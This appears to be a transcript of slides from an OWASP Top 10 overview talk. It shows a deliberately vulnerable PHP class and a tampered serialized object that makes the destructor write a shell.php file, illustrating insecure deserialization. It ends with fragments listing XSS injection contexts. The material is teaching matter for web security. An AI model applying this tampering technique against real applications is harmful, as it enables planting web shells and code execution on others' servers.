OWASP Top 10 Overview
evandentremont
December 17, 2020
Transcript
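<?php
// Vulnerable class: the destructor writes whatever the object's properties hold to disk.
class file {
    public $file = "file.txt";
    public $data = "some text";

    function __destruct() {
        file_put_contents($this->file, $this->data);
    }
}

Serialized object:
O:4:"file":2:{s:4:"file";s:8:"file.txt";s:4:"data";s:9:"some text";}

Tampered serialized object:
O:4:"file":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:8:"<?php ?>";}

Effect when the tampered object is unserialized and then destroyed:
<?php file_put_contents("shell.php", "<?php ?>"); ?>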
• – <script>X</script>, <!--X-->, <div X="y">, <X></X>, <style>X</style>
• – <div attr=X>, <div attr="X">, <div attr='X'>
• – <script>alert('X'), data='X', <div onClick="data='X'"
– selector { property:X;}, <span style="property:X;">